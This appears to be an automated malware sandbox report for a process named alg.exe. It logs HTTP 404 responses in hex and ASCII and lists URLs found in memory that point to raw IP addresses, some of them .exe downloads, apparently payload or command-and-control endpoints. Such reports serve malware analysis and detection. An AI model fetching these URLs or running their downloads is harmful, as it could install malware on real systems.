              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:35:37 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:35:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:35:45 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 04 Mar 2025 08:36:08 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 04 Mar 2025 08:36:09 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:36:32 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 04 Mar 2025 08:36:32 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: alg.exe, 0000000D.00000003.2181291982.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2259482527.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2288608476.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2276640960.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2200527185.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2267339346.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2229080820.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2246556685.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2210269453.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/kgihcqktxx
              Source: alg.exe, 0000000D.00000003.2259482527.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2246556685.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/ksbp
              Source: alg.exe, 0000000D.00000003.1913930438.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914915915.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907846105.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1908959853.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907606835.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/lljqple
              Source: alg.exe, 0000000D.00000003.1907846105.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/lljqple0b1d
              Source: alg.exe, 0000000D.00000003.1913930438.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914915915.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1908959853.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907606835.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/lljqplest.exe
              Source: alg.exe, 0000000D.00000003.2025611759.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032480249.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040378345.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007443563.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2007952814.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2017070889.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2032923896.0000000000538000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2016629204.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/tpyri7444
              Source: alg.exe, 0000000D.00000003.1917967381.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1914053502.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932808513.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1907846105.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955254799.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1944621326.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/lljqple
              Source: alg.exe, 0000000D.00000003.2046169214.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2088717654.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2040810220.0000000000509000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2078285049.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/seueafvlbcmx
              Source: alg.exe, 0000000D.00000003.2041235754.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/seueafvlbcmxpbe
              Source: alg.exe, 0000000D.00000003.2046169214.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046971759.000000000050E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2064037327.0000000000539000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/vqrfhgg
              Source: alg.exe, 0000000D.00000003.2067214816.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2062612258.000000000052A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2046169214.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2056093276.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/vqrfhggc
              Source: alg.exe, 0000000D.00000003.2046971759.000000000050E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20/vqrfhggs
              Source: alg.exe, 0000000D.00000003.2040810220.0000000000509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.160.13.20:80/seueafvlbcmx
              Source: alg.exe, 0000000D.00000003.1917967381.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932808513.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/eyajoanbw
              Source: alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1957228645.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1972777177.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/eyajoanbw.exe
              Source: alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1917871727.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/eyajoanbwM
              Source: alg.exe, 0000000D.00000003.2181291982.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2163395398.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2154720665.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2143416467.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2144486551.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/gtvqg
              Source: alg.exe, 0000000D.00000003.2106093399.000000000053A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2116238505.000000000053A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/llkyp
              Source: alg.exe, 0000000D.00000003.1944474303.000000000052C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932675425.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/wgmealrwqlbauh
              Source: alg.exe, 0000000D.00000003.1957847112.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1966658212.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932292743.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1983866160.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1973326884.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1943728081.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.2000758926.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1999368202.0000000000557000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1955019744.0000000000557000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/wgmealrwqlbauhTf
              Source: alg.exe, 0000000D.00000003.1572794877.0000000000532000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1576172278.0000000000529000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1576253777.000000000052F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1576298008.000000000050E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/xfhngbevi
              Source: alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/xfhngbevi2$d
              Source: alg.exe, 0000000D.00000003.1917967381.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1932808513.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/eyajoanbw
              Source: alg.exe, 0000000D.00000003.1508234940.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/krqescexcxjlmqje
              Source: alg.exe, 0000000D.00000003.1790797442.000000000050A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 0000000D.00000003.1575202487.000000000050A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/xfhngbevi
              Source: alg.exe, 0000000D.00000003.2153120949.0000000000529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/kfeqymn
